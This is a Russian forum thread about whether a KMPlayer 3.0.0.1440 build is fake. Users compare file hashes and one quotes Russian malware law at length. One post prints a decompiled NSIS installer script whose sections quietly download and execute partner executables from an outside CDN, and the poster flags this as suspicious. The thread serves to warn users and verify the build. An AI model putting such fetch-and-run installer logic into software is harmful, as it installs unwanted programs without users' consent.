» The KMPlayer (часть 4)

Engaged Clown

Ты так и не обратил внимания, что я официально озвучил позицию Администрации KMPMedia? Корейский сервер принадлежит компании Pandora TV, и к нам никакого отношения не имеет, а тот файл что ты выложил это подделка ноги которой растут с китайского форума Пандоры от одного из их пользователей. Сейчас isroot и команда разработчиков переписывают код для устранения ряда обнаруженных "особенностей" компилятора. Исправят - выложат. Эти "ошибки" были заложены в компилятор и выплыли только сейчас и оставлять их нельзя т.к. они влияют на стабильность программы. Нечего столь активно проталкивать идею с этой подделкой. У настоящего KMPlayer.exe SHA-256 такая:

a680891e8e4d9deec6e39ffc7fb9d67c770821196792e0910ba29cd7a3737fa1 *KMPlayer.exe

а у твоей подделки такая:

817dd60f389d7ec6b32b8428a058fc2b44ad7db25ee1713e47dd8a981d7c5851 *KMPlayer.exe

есть разница?

XXXLer
Al6bus
ALEX90
SELENITH

SamLab правильно сделал - он обратил внимание на то, что есть люди которым желательно "заработать очки" на этой шумихе, что они и пытаются активно сделать. Если бы isroot и команда разработчиков были бы уверены в готовности версии 3.0.0.1440, то она уже была бы доступна на официальном форуме, а на данный момент ни у кого из нас такой уверенности нет, и потому все разговоры просто бессмысленны. Как только она будет готова, её выложат без промедления, а пока по Рунету гуляют различные самоделки и протрояненные подделки.

Хотите проблемы, в том числе и с Законом? Пользуйтесь, но не говорите, что Вас об этом не предупреждали - риск благородное дело, но в пределах того, насколько человек готов за него отвечать. Кто из Вас готов оплачивать из собственного кармана пострадавшим стоимость работ по восстановлению оборудования и данных в случае наступления критических последствий вызванных этой сборкой или сесть в тюрьму по ст 273 УК РФ? Думаю никто, а раз так, то и вопрос закрыт.

Готовы рисковать? Готовьте деньги на оплату риска, да и сухари заодно сушите, нет - пользуйтесь для себя лично, но и примите на себя всю полноту ответственности за своё решение. Т

олько так, а не иначе. Пока статью 273 УК РФ никто не отменял, а пострадавшие пользователи вполне могут обратится с жалобой на её нарушение и какой нибудь ретивый чиновник вспомнит, что согласно ст. 273 УК:

Цитата:

Уголовный кодекс Российской Федерации
Статья 273. Создание, использование и распространение вредоносных программ для ЭВМ

1. Создание программ для ЭВМ или внесение изменений в существующие программы, заведомо приводящих к несанкционированному уничтожению, блокированию, модификации либо копированию информации, нарушению работы ЭВМ, системы ЭВМ или их сети, а равно использование либо распространение таких программ или машинных носителей с такими программами - наказываются лишением свободы на срок до трех лет со штрафом в размере до двухсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период до восемнадцати месяцев.
(в ред. Федерального закона от 08.12.2003 N 162-ФЗ)

2. Те же деяния, повлекшие по неосторожности тяжкие последствия, -
наказываются лишением свободы на срок от трех до семи лет.

Комментарий к статье 273 УК РФ.

1. Под вредоносными программами в смысле комментируемой статьи понимаются программы, специально созданные для нарушения нормального функционирования компьютерных программ. Под нормальным функционированием понимается выполнение операций, для которых эти программы предназначены, что определено в документации на программу.
В настоящее время самыми распространенными являются программы, предназначенные для сбора информации, и программы для несанкционированного доступа к ЭВМ либо другим программам.

"Компьютерные вирусы" - это программы, которые умеют воспроизводить себя в нескольких экземплярах, модифицировать (изменять) программу, к которой они присоединились, и тем самым нарушать ее нормальное функционирование.

"Логические бомбы" - это умышленное изменение кода программы, частично или полностью выводящее из строя программу либо систему ЭВМ при определенных заранее условиях, например наступлении определенного времени.
Принципиальное отличие "логических бомб" от "компьютерных вирусов" состоит в том, что они изначально являются частью программы и не переходят в другие программы, а "компьютерные вирусы" являются динамичными программами и могут распространяться даже по компьютерным сетям.

2. Объективную сторону данного преступления составляет факт создания программ для ЭВМ или внесение изменений в существующие программы, заведомо приводящих к несанкционированному уничтожению, блокированию, модификации либо копированию информации, нарушению работы ЭВМ, системы ЭВМ или их сети (см. коммент. к ст. 272), а равно использование либо распространение таких программ или машинных носителей с такими программами.

Под использованием программы понимается выпуск в свет, воспроизведение, распространение и иные действия по их введению в оборот. Использование может осуществляться путем записи программы в память ЭВМ, на материальный носитель, распространения по сетям либо путем иной передачи другим лицам.

Данный состав является формальным и не требует наступления каких-либо последствий, уголовная ответственность возникает уже в результате создания программы, независимо от того, использовалась эта программа или нет. По смыслу комментируемой статьи наличие исходных текстов вирусных программ уже является основанием для привлечения к ответственности. Однако следует учитывать, что в ряде случаев использование подобных программ не будет являться уголовно наказуемым. Это относится к деятельности организаций, осуществляющих разработку антивирусных программ и имеющих лицензию на деятельность по защите информации, выданную Государственной технической комиссией при Президенте РФ.

Формой совершения данного преступления может быть только действие, выраженное в виде создания вредоносных программ для ЭВМ, внесения изменений в уже существующие программы, а равно использование либо распространение таких программ. Распространение машинных носителей с такими программами полностью покрывается понятием "использование".

3. С субъективной стороны преступление, предусмотренное ч. 1 комментируемой статьи, может быть совершено только с прямым умыслом, так как в этой статье определено, что создание вредоносных программ заведомо для создателя программы должно привести к несанкционированному уничтожению, блокированию, модификации либо копированию информации, нарушению работы ЭВМ.

Использование или распространение вредоносных программ тоже может осуществляться только умышленно, так как в соответствии с ч. 2 ст. 24 УК деяние, совершенное по неосторожности, признается преступлением только в том случае, когда это специально предусмотрено соответствующей статьей Особенной части УК.

4. Часть 2 комментируемой статьи в отличие от ч. 1 в качестве квалифицирующего признака предусматривает наступление тяжких последствий по неосторожности. Разработка вредоносных программ доступна только квалифицированным программистам, которые в силу своей профессиональной подготовки должны предвидеть возможные последствия использования этих программ.

В случае, если установлен прямой умысел, охватывающий и наступление тяжких последствий, квалификация данного преступления должна основываться на цели, которая стояла перед виновным. В этом случае создание программы либо внесение изменений в программу будут являться только способом совершения преступления и должна применяться ч. 2 ст. 17 УК.

5. Субъектом данного преступления может быть любой гражданин, достигший 16 лет.

не знаю как вам, а у меня попадать под раздачу, особенно по чьей то дури нет никакого желания.

Надеюсь, что я ясно выразился.

P.S.

Сейчас этими делами занимаются не только отдел "К" где работают профессионалы, но и любой участковый или опер, а им важна "раскрываемость преступлений", и смотреть сдуру или по умыслу человек запустил в сеть эту программу, особенно если у него на столе лежит заявление от пострадавшего с приложением счетов за устранение последствий эти люди не станут - их начальство требует от них действий в виде раскрытых преступлений и обвинительных судебных приговоров, а в таком случае им проще посадить того, кто громче всех орал по старому советскому ещё принципу "У нас не виновных не сажают, раз посадили, значит виноват!". А вот вы уже будете потом доказывать что вас посадили зря, и вы мол не верблюд. Но у нас такая правоохранительная система, что ей плевать на невиновность человека - любое подозрение для неё равносильно тому, что событие уже произошло, и доказательства невиновности человека её абсолютно не интересуют - сегодня, с учётом действующих в сфере ИТ законов используется принцип презумпции виновности - т.е. человек изначально считается виноватым и обязан доказывать свою невиновность. И следствие, а особенно суд эти доказательства не интересуют, они действуют по принципу "По внутреннему убеждению суда". И добрых 90% судебных решений последних лет обоснованы эти "внутренним убеждением суда". У меня есть знакомые адвокаты и я видел с каким трудом они добиваются даже простого согласия суда выслушать их по таким делам, но пока из нескольких сотен случаев только один закончился отменой приговора и отправкой дела на повторное расследование, а в остальных суды верхних инстанций просто проштамповали приговор отказав в рассмотрении доказательств невиновности осуждённого опять же мотивируя это всё тем же пресловутым "внутренним убеждением суда".

Такова наша действительность, и это надо принимать как данность на сегодня. Может завтра мы и увидим какие изменения, но те, кто это сделал кровно заинтересованы в таком положении дел и без боя не сдадутся.

Victor_VG
спрятали бы под спойлер это огроменное сообщение
А вот почему на форуме все равно подпись Supported by PANDORA.TV, если KMP уже им не принадлежит?

freeman440

Просто площадка где расположен форум технически поддерживается Pandora TV. По остальному - желающие продолжать отстаивать фейки могут высказать свою позицию прямо на официальном форуме и там же убедить isroot, kent, Raiden, DeXTeRPuNk, bastik, Pantuflo и меня в том, что мы не правы, и это официальная сборка, а мы мешаем прогрессу.

Victor_VG

Цитата:

Ты так и не обратил внимания, что я официально озвучил позицию Администрации KMPMedia? Корейский сервер принадлежит компании Pandora TV, и к нам никакого отношения не имеет, а тот файл что ты выложил это подделка ноги которой растут с китайского форума Пандоры от одного из их пользователей.

Обратил.
Ок, пойдём другим путём:
Предположим я кореец, я кликаю в шапке по ссылке:
Текущая официальная версия: 3.0.0.1439.

Видим, что файл выложен 7-го апреля 2011 года, и качается он с официального сайта KMP, а не с пандоры. Теперь можно считать, что это официальная сборка 1440 или опять нет?

Engaged Clown

Давай проверим её SHA-256 и сверим с тем, что мы уже знаем. Если что не поймём, то я задам вопрос isroot. Что проще?

Victor_VG
На ргосте показывается
MD5 7041efcd3e10fa64f5d60098881a350e
SHA1 af830027fa95b2ff55d22e264a82cbbb8e794129

Если просто зайти на сайт и жмакнуть download, то качается вот что


а это сборка, выложенная Engaged Clown



авторские права - Пандора ТВ. что наводит на мысль....

CRC32: AABCDBBB
MD5: 7041EFCD3E10FA64F5D60098881A350E
SHA-1: AF830027FA95B2FF55D22E264A82CBBB8E794129
SHA-256: AE04BBA96FDBD7CA3772E9C8D1D01E9FA256F9A2423B402B3A2880F88EB6032E

контрольные суммы для выложенной сборки, что не совпадает со значением, написанным Victor_VG

Да и при установке предлагает установить какую то левую лабуду.
Так что делаем выводы...

Shteger

Цитата:

авторские права - Пандора ТВ. что наводит на мысль....

Так я всё пытаюсь понять - почему то, что я выложил качается с оффсайта?

Engaged Clown
Shteger

На корейском форуме, принадлежащем Пандора, есть пост якобы от имени isroot :



я сделал снимок автоперевода этой страницы, но предлагаю у самого isroot спросить - не просто так он просил пока подождать с публикацией. Та сборка, для которой я привёл SHA-256 была выложена им в модерке 17.03.2011, тут размеры похожи, и версия вроде та, но надо код сравнивать. Это потребует времени, ждите что выйдет - скажу.Исходников нет, придётся бинарники сверять.

Ребята, похоже это очередной китайский левак - с Pandora TV из того поста, что я привёл качается обычный 1439, здесь что-то похожее на 1440, но смотрите что в [more=скрипте установки]Call 1131
SetFlag 13 0
File $PLUGINSDIR\modern-wizard.bmp
Return
GetFunctionAddress 0 0
ShowWindow 96 100
ShowWindow 102 100
ShowWindow 106 100
ShowWindow 110 100
ShowWindow 114 100
ShowWindow 118 100
ShowWindow 122 126
GetFunctionAddress 1 0
Return
GetFunctionAddress 0 0
ShowWindow 96 126
ShowWindow 102 126
ShowWindow 106 126
ShowWindow 110 126
ShowWindow 114 126
ShowWindow 118 126
ShowWindow 122 100
GetFunctionAddress 1 0
Return
Call 1131
File $PLUGINSDIR\nsDialogs.dll
SetFlag 13 0
Push 1044
RegisterDLL $PLUGINSDIR\nsDialogs.dll Create 0
Pop $[44]
Call 1131
File $PLUGINSDIR\nsDialogs.dll
SetFlag 13 0
Push -38
RegisterDLL $PLUGINSDIR\nsDialogs.dll SetRTL 0
SerCtlColors 165 0 0
Call 1131
File $PLUGINSDIR\nsDialogs.dll
SetFlag 13 0
Push
Push 193u
Push 109u
Push 0u
Push 0u
Push 0
Push 0x40000000|0x10000000|0x04000000|0x0000000E|0x00000100
Push STATIC
RegisterDLL $PLUGINSDIR\nsDialogs.dll CreateControl 0
Pop $[45]
Push $0
Push $1
Push $2
Push $R0
StrCpy $R0 "$[45]"
StrCpy $1 ""
StrCpy $2 ""
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push *(i, i, i, i) i.s
RegisterDLL $PLUGINSDIR\System.dll Call 0
Pop $0
IntCmp $0 0 81 0 0
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push user32::GetClientRect(iR0, ir0)
RegisterDLL $PLUGINSDIR\System.dll Call 0
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push *$0(i, i, i .s, i .s)
RegisterDLL $PLUGINSDIR\System.dll Call 0
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push $0
RegisterDLL $PLUGINSDIR\System.dll Free 0
Pop $1
Pop $2
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push $PLUGINSDIR\modern-wizard.bmp
Push user32::LoadImage(i0, ts, i 0, ir1, ir2, i0x0010) i.s
RegisterDLL $PLUGINSDIR\System.dll Call 0
Pop $0
SendMessage $R0 0x0172 100 258
Pop $R0
Pop $2
Pop $1
Push $0
Exch
Pop $0
Pop $[46]
Call 1131
File $PLUGINSDIR\nsDialogs.dll
SetFlag 13 0
Push Welcome to the The KMPlayer Setup Wizard
Push 28u
Push 195u
Push 10u
Push 120u
Push 0x00000020
Push 0x40000000|0x10000000|0x04000000|0x00000100
Push STATIC
RegisterDLL $PLUGINSDIR\nsDialogs.dll CreateControl 0
Pop $[47]
SerCtlColors 551 0 0
CreateFont 48 -39 555 558 0
SendMessage $[47] 0x0030 562 100
Call 1131
File $PLUGINSDIR\nsDialogs.dll
SetFlag 13 0
Push -40
Push 130u
Push 195u
Push 45u
Push 120u
Push 0x00000020
Push 0x40000000|0x10000000|0x04000000|0x00000100
Push STATIC
RegisterDLL $PLUGINSDIR\nsDialogs.dll CreateControl 0
Pop $[49]
SerCtlColors 582 0 0
Call 5
Call 1131
File $PLUGINSDIR\nsDialogs.dll
SetFlag 13 0
RegisterDLL $PLUGINSDIR\nsDialogs.dll Show 0
Call 15
IntCmp $[46] 0 139 0 0
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push $[46]
Push gdi32::DeleteObject(is)
RegisterDLL $PLUGINSDIR\System.dll Call 0
Return
Return
SendMessage $[32] 0x000C 100 -43
SendMessage $[34] 0x000C 100 -44
Return
FindWindow 50 628 0 635 0
GetDlgItem $[51] $[50] 1040
GetDlgItem $[52] $[50] 1006
GetDlgItem $[53] $[50] 1000
SendMessage $[51] 0x000C 100 -45
Return
Return
SendMessage $[32] 0x000C 100 -46
SendMessage $[34] 0x000C 100 -47
Return
FindWindow 54 628 0 635 0
GetDlgItem $[55] $[54] 1006
GetDlgItem $[56] $[54] 1021
GetDlgItem $[57] $[54] 1022
GetDlgItem $[58] $[54] 1017
GetDlgItem $[59] $[54] 1032
GetDlgItem $[60] $[54] 1042
GetDlgItem $[62] $[54] 1043
GetDlgItem $[64] $[54] 1023
GetDlgItem $[63] $[54] 1257
SendMessage $[60] 0x000C 100 -48
ShowWindow 710 100
SendMessage $[62] 0x000C 100 -49
StrCpy $[61] "-49"
Return
Return
SendMessage $[32] 0x000C 100 -50
SendMessage $[34] 0x000C 100 -51
Return
FindWindow 65 628 0 635 0
GetDlgItem $[66] $[65] 1006
GetDlgItem $[67] $[65] 1020
GetDlgItem $[68] $[65] 1019
GetDlgItem $[69] $[65] 1001
GetDlgItem $[70] $[65] 1023
GetDlgItem $[71] $[65] 1024
Return
Return
SendMessage $[32] 0x000C 100 -52
SendMessage $[34] 0x000C 100 -53
Return
FindWindow 72 628 0 635 0
GetDlgItem $[73] $[72] 1006
GetDlgItem $[74] $[72] 1004
GetDlgItem $[75] $[72] 1027
GetDlgItem $[76] $[72] 1016
Return
IfFlag 195 0 3 -1
SendMessage $[32] 0x000C 100 -54
SendMessage $[34] 0x000C 100 -55
Goto 197
SendMessage $[32] 0x000C 100 -56
SendMessage $[34] 0x000C 100 -57
IfFlag 198 0 3 -1
Return
Call 1131
SetFlag 13 0
File $PLUGINSDIR\modern-wizard.bmp
Call 1
SetFlag 0 126
Return
ShellExecute 757 762 0 1
Return
SendMessage $[41] 0x000C 100 -58
Call 1131
File $PLUGINSDIR\nsDialogs.dll
SetFlag 13 0
Push 1044
RegisterDLL $PLUGINSDIR\nsDialogs.dll Create 0
Pop $[77]
Call 1131
File $PLUGINSDIR\nsDialogs.dll
SetFlag 13 0
Push -38
RegisterDLL $PLUGINSDIR\nsDialogs.dll SetRTL 0
SerCtlColors 833 0 0
Call 1131
File $PLUGINSDIR\nsDialogs.dll
SetFlag 13 0
Push
Push 193u
Push 109u
Push 0u
Push 0u
Push 0
Push 0x40000000|0x10000000|0x04000000|0x0000000E|0x00000100
Push STATIC
RegisterDLL $PLUGINSDIR\nsDialogs.dll CreateControl 0
Pop $[78]
Push $0
Push $1
Push $2
Push $R0
StrCpy $R0 "$[78]"
StrCpy $1 ""
StrCpy $2 ""
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push *(i, i, i, i) i.s
RegisterDLL $PLUGINSDIR\System.dll Call 0
Pop $0
IntCmp $0 0 264 0 0
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push user32::GetClientRect(iR0, ir0)
RegisterDLL $PLUGINSDIR\System.dll Call 0
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push *$0(i, i, i .s, i .s)
RegisterDLL $PLUGINSDIR\System.dll Call 0
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push $0
RegisterDLL $PLUGINSDIR\System.dll Free 0
Pop $1
Pop $2
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push $PLUGINSDIR\modern-wizard.bmp
Push user32::LoadImage(i0, ts, i 0, ir1, ir2, i0x0010) i.s
RegisterDLL $PLUGINSDIR\System.dll Call 0
Pop $0
SendMessage $R0 0x0172 100 258
Pop $R0
Pop $2
Pop $1
Push $0
Exch
Pop $0
Pop $[79]
Call 1131
File $PLUGINSDIR\nsDialogs.dll
SetFlag 13 0
Push -59
Push 28u
Push 195u
Push 10u
Push 120u
Push 0x00000020
Push 0x40000000|0x10000000|0x04000000|0x00000100
Push STATIC
RegisterDLL $PLUGINSDIR\nsDialogs.dll CreateControl 0
Pop $[80]
SerCtlColors 841 0 0
CreateFont 81 -39 555 558 0
SendMessage $[80] 0x0030 845 100
Call 1131
File $PLUGINSDIR\nsDialogs.dll
SetFlag 13 0
Push -60
Push 40u
Push 195u
Push 45u
Push 120u
Push 0x00000020
Push 0x40000000|0x10000000|0x04000000|0x00000100
Push STATIC
RegisterDLL $PLUGINSDIR\nsDialogs.dll CreateControl 0
Pop $[82]
SerCtlColors 853 0 0
Call 1131
File $PLUGINSDIR\nsDialogs.dll
SetFlag 13 0
Push -61
Push 10u
Push 195u
Push 90u
Push 120u
Push 0
Push 0x40000000|0x10000000|0x04000000|0x00010000|0x00000000|0x00000C00|0x00000003|0x00002000
Push BUTTON
RegisterDLL $PLUGINSDIR\nsDialogs.dll CreateControl 0
Pop $[84]
SerCtlColors 956 0 0
SendMessage $[84] 0x00F1 126 100
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push user32::SetFocus(i$[84])
RegisterDLL $PLUGINSDIR\System.dll Call 0
Call 1131
File $PLUGINSDIR\nsDialogs.dll
SetFlag 13 0
Push Visit the KMP site for the latest news, FAQs and support
Push 10u
Push 195u
Push 175u
Push 120u
Push 0
Push 0x40000000|0x10000000|0x04000000|0x00010000|0x0000000B
Push LINK
RegisterDLL $PLUGINSDIR\nsDialogs.dll CreateControl 0
Pop $[85]
SerCtlColors 1112 24 0
Push $0
Push $1
StrCpy $1 "$[85]"
StrCpy $0 "205"
Call 1131
File $PLUGINSDIR\nsDialogs.dll
SetFlag 13 0
Push $0
Push $1
RegisterDLL $PLUGINSDIR\nsDialogs.dll OnClick 0
Pop $1
Pop $0
Call 5
Call 1131
File $PLUGINSDIR\nsDialogs.dll
SetFlag 13 0
RegisterDLL $PLUGINSDIR\nsDialogs.dll Show 0
Call 15
IntCmp $[79] 0 368 0 0
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push $[79]
Push gdi32::DeleteObject(is)
RegisterDLL $PLUGINSDIR\System.dll Call 0
Return
SendMessage $[84] 0x00F0 100 100 $[956]
IntCmp $[83] 1 0 372 372
Execute 1139 0 0
Return
GetDlgItem $[32] $HWNDPARENT 1037
CreateFont 33 -39 -62 558 0
SendMessage $[32] 0x0030 1167 100
GetDlgItem $[34] $HWNDPARENT 1038
SerCtlColors 106 0 0
SerCtlColors 110 0 0
Call 1131
SetFlag 13 0
File $PLUGINSDIR\modern-header.bmp
SetBrandingImage 1176
GetDlgItem $[35] $HWNDPARENT 1034
SerCtlColors 1203 0 0
GetDlgItem $[36] $HWNDPARENT 1039
SerCtlColors 114 0 0
GetDlgItem $[38] $HWNDPARENT 1028
SerCtlColors 96 48 0
GetDlgItem $[37] $HWNDPARENT 1256
SerCtlColors 102 48 0
SendMessage $[37] 0x000C 100 1222
GetDlgItem $[39] $HWNDPARENT 1035
GetDlgItem $[40] $HWNDPARENT 1045
GetDlgItem $[41] $HWNDPARENT 1
GetDlgItem $[42] $HWNDPARENT 2
GetDlgItem $[43] $HWNDPARENT 3
Call 199
Return
MessageBox 52 -63 6 401 0
Abort
Return
Call 1131
SetFlag 13 0
File $PLUGINSDIR\splash.bmp
Call 1131
File $PLUGINSDIR\AdvSplash.dll
SetFlag 13 0
Push $PLUGINSDIR\splash
Push -1
Push 400
Push 600
Push 1000
RegisterDLL $PLUGINSDIR\AdvSplash.dll show 0
Pop $0
Delete $PLUGINSDIR\splash.bmp
Push
Push 1033
Push English
Push 1042
Push Korean
Push A
Call 1131
File $PLUGINSDIR\LangDLL.dll
SetFlag 13 0
Push Please select the language of the installer
Push Installer Language
RegisterDLL $PLUGINSDIR\LangDLL.dll LangDialog 0
Pop $LANGUAGE
StrCmp "$LANGUAGE" "cancel" 0 431 0
Abort
Return
SetOutPath $INSTDIR
File KMPlayer.exe
WriteUninstaller uninstall.exe 56608554 17578
Return
SetOutPath $INSTDIR
Push $R0
SetFlag 2 100
Call 1131
File $PLUGINSDIR\Dialer.dll
SetFlag 13 0
RegisterDLL $PLUGINSDIR\Dialer.dll AttemptConnect 0
Pop $R0
StrCmp "$R0" "online" 446 0 0
Goto 461
StrCpy $R1 "Keyword"
StrCpy $R2 "$TEMP\KMPlayer_Addon$R1.exe"
StrCpy $R3 "http://cdn.kmplayer.com/KMP/Download/Partner/$R1.exe" /* скачается http://cdn.kmplayer.com/KMP/Download/Partner/Keyword.exe */
Call 1131
File $PLUGINSDIR\NSISdl.dll
SetFlag 13 0
Push $R2
Push $R3
RegisterDLL $PLUGINSDIR\NSISdl.dll download 0
Pop $0
StrCmp "$0" "success" 458 0 0
Goto 461
Execute 1646 -1 1
Sleep 653
Delete "$R2"
Return
SetOutPath $INSTDIR
Push $R0
SetFlag 2 100
Call 1131
File $PLUGINSDIR\Dialer.dll
SetFlag 13 0
RegisterDLL $PLUGINSDIR\Dialer.dll AttemptConnect 0
Pop $R0
StrCmp "$R0" "online" 472 0 0
Goto 487
StrCpy $R1 "vaccineclean"
StrCpy $R2 "$TEMP\KMPlayer_Addon$R1.exe"
StrCpy $R3 "http://cdn.kmplayer.com/KMP/Download/Partner/$R1.exe" /* скачается - http://cdn.kmplayer.com/KMP/Download/Partner/vaccineclean.exe */
Call 1131
File $PLUGINSDIR\NSISdl.dll
SetFlag 13 0
Push $R2
Push $R3
RegisterDLL $PLUGINSDIR\NSISdl.dll download 0
Pop $0
StrCmp "$0" "success" 484 0 0
Goto 487
Execute 1665 -1 1
Sleep 653
Delete "$R2"
Return
SetOutPath $INSTDIR
File AboutDLL.dll
File DTView.dll
File PProcDLL.DLL
File URLList.txt
File libmplay.dll
File Old_QUARTZ.DLL
File bass.dll
File bass_alac.dll
File bass_ape.dll
File bass_flac.dll
File bass_mpc.dll
File bass_tta.dll
File bass_wv.dll
File ColorTheme.ini
File unrarDLL.dll
File ImLoader.dll
File KIconLib.dll
File MediaInfo.dll
File gpl.txt
File LGPL.TXT
File files.txt
File KMPSetup.exe
File KMP_Album_Art.swf
File KMPAlbumArt.dll
SetOutPath $INSTDIR\WizardLanguage
File KMPWiz_Albanian.ini
File KMPWiz_Bosanski.ini
File KMPWiz_Brazilian_Portuguese.ini
File KMPWiz_Bulgarian.ini
File KMPWiz_Chinese_Traditional.ini
File KMPWiz_Chinese_simple.ini
File KMPWiz_English_External.ini
File KMPWiz_Estonian.ini
File KMPWiz_Farsi.ini
File KMPWiz_Finnish.ini
File KMPWiz_French.ini
File KMPWiz_German.ini
File KMPWiz_Greek.ini
File KMPWiz_Hungarian(Magyar).ini
File KMPWiz_Hungarian(Magyar)_External.ini
File KMPWiz_Italian.ini
File KMPWiz_Japanese.ini
File KMPWiz_Polish.ini
File KMPWiz_Romanian(cu_diacritice).ini
File KMPWiz_Romanian(fara_diacritice).ini
File KMPWiz_Russian.ini
File KMPWiz_Spanish.ini
File KMPWiz_Swedish.ini
File KMPWiz_Thai.ini
File KMPWiz_catal.ini
SetOutPath $INSTDIR\Language
File Albanian.ini
File Arabic.ini
File Belarusian.ini
File Brazilian Portuguese.ini
File Bulgarian.ini
File Chinesebig5.ini
File Chinesesimp.ini
File Czech.ini
File Dutch.ini
File English.ini
File EnglishUK.ini
File Farsi.ini
File Finnish.ini
File French.ini
File German.ini
File Greek.ini
File Hebrew.ini
File Hungarian.ini
File Italian.ini
File Japanese.ini
File Korean.ini
File Polish.ini
File Portuguese.ini
File Romanian.ini
File Russian.ini
File Spanish.ini
File Swedish.ini
File Thai.ini
File Turkish.ini
File Ukrainian.ini
File Vietnam.ini
SetOutPath $INSTDIR\Shader
File Contour.txt
File Deinterlace (blend).txt
File DisplayLessThan16 v1_1.txt
File EdgeSharpen v1_1(jim ro).txt
File EdgeSharpen v1_1.txt
File Emboss.txt
File Invert.txt
File Letterbox.txt
File Procamp.txt
File Remap_16_235.txt
File SharpenComplex (jim ro).txt
File SharpenFlou (jim ro).txt
File Sharpen_3x3.txt
File Sharpen_5x5.txt
File Sphere.txt
File Spotlight.txt
File Undot.txt
File Unsharp mask.txt
File Wave.txt
Return
SetOutPath $INSTDIR
File libcodec.dll
File xviddll.dll
File libmpeg2.dll
File libfaad2.dll
File libmad.dll
File theora.dll
File OggVorbis.dll
File libdts.dll
File liba52.dll
File realaac.dll
File libfaac.dll
Return
SetOutPath $INSTDIR
File ac3filter.ax
File iconv.dll
File RealMediaSplitter.ax
File MatroskaSplitter.ax
File AviSplitter.ax
File OggSplitter.ax
File MMSwitch.ax
File MpegSplitter.ax
File Mpeg2DecFilter.ax
File MpaDecFilter.ax
File DiracSplitter.ax
File RoQSplitter.ax
File NutSplitter.ax
File MpaSplitter.ax
File DSMSplitter.ax
File aac_parser.ax
File audioswitcher.ax
File MP4Splitter.ax
File qscl.dll
File FLVSplitter.ax
Return
SetOutPath $INSTDIR\PlugIns
File IN_MP3.DLL
File dsp_enh.dll
File enc_aac.dll
File enc_aacplus.dll
File enc_lame.dll
File enc_mp4.dll
File enc_vorbis.dll
File enc_wma.dll
File gen_hotkeys.dll
File gen_ml.dll
File gen_ml.ini
File in_mp4.dll
File in_nsv.dll
File in_vorbis.dll
File in_wm.dll
File lame_enc.dll
File lamedll.dll
File libmp4v2.dll
File nsvdec_vp5.dll
File nsvdec_vp6.dll
File wmahelp.dll
Return
SetOutPath $INSTDIR\Skins
File Default.ksf
Return
SetOutPath $INSTDIR\SDK
File KMPPlgIn.dcu
File KMPPlgIn.h
File KMPPlgIn.pas
File readme.txt
SetOutPath $INSTDIR\SDK\Exam_C
File DSP_TestC.cpp
File DSP_TestC.def
File DSP_TestC.dsp
File DSP_TestC.dsw
File DSP_TestC.ncb
File ReadMe.txt
File StdAfx.cpp
File StdAfx.h
SetOutPath $INSTDIR\SDK\Exam_Delphi
File dsp_TestPas.cfg
File dsp_TestPas.dof
File dsp_TestPas.dpr
File dsp_TestPas.res
SetOutPath $INSTDIR\SDK\WinampVis
File VisMain.dfm
File VisMain.pas
File WinampVisBase.pas
File dsp_winampvis.cfg
File dsp_winampvis.dof
File dsp_winampvis.dpr
File dsp_winampvis.res
Return
SetOutPath $INSTDIR
SetOutPath $COMMONFILES\The KMPlayer
CreateShortCut "$COMMONFILES\The KMPlayer\KMPlayer.lnk" "$INSTDIR\KMPlayer.exe" 0 0 0
CreateShortCut "$COMMONFILES\The KMPlayer\KMPlayer Setup Wizard.lnk" "$INSTDIR\KMPSetup.exe" 0 0 0
WriteINIStr 4386 4403 -81 4407
CreateShortCut "$COMMONFILES\The KMPlayer\Uninstall KMPlayer.lnk" "$INSTDIR\uninstall.exe" 0 0 0
CreateShortCut "$COMMON_DESKTOPDIRECTORY\KMPlayer.lnk" "$INSTDIR\KMPlayer.exe" 0 0 0
WriteRegStr HKLM "Software\Microsoft\Windows\CurrentVersion\Uninstall\The KMPlayer" "DisplayName" "The KMPlayer (remove only)"
WriteRegStr HKLM "Software\Microsoft\Windows\CurrentVersion\Uninstall\The KMPlayer" "UninstallString" ""$INSTDIR\uninstall.exe""
WriteRegStr HKCU "SOFTWARE\KMPlayer\KMP2.0\OptionArea" "InstallPath" "$INSTDIR\KMPlayer.exe"
Return
SetOutPath $INSTDIR
Execute 4692 -1 1
Sleep 4720
Return
StrCmp "$0" "-1" 0 701 0
SendMessage $[62] 0x000C 100 0
ShowWindow 710 100
SendMessage $[62] 0x000C 100 4724
Goto 1130
StrCmp "$0" "0" 0 744 0
SendMessage $[62] 0x000C 100 0
ShowWindow 710 126
SendMessage $[62] 0x000C 100 -82
File $PLUGINSDIR\Description.txt
Push $0
Push $1
Push $2
Push $3
SetFlag 2 100
FileOpen 0 2147483648 3 4728
IfFlag 738 0 2 0
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push kernel32::GetFileSize(i r0, i 0) i .r1
RegisterDLL $PLUGINSDIR\System.dll Call 0
IntOp $1 $1 + 1
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push $1
RegisterDLL $PLUGINSDIR\System.dll Alloc 0
Pop $2
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push kernel32::ReadFile(i r0, i r2, i r1, *i .r3, i 0)
RegisterDLL $PLUGINSDIR\System.dll Call 0
FileClose 0
SendMessage $[63] 0x00C5 262 100
SendMessage $[63] 0x000C 100 266
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push $2
RegisterDLL $PLUGINSDIR\System.dll Free 0
SetFlag 2 100
Pop $3
Pop $2
Pop $1
Pop $0
Goto 1130
StrCmp "$0" "3" 0 787 0
SendMessage $[62] 0x000C 100 0
ShowWindow 710 126
SendMessage $[62] 0x000C 100 -83
File $PLUGINSDIR\Description.txt
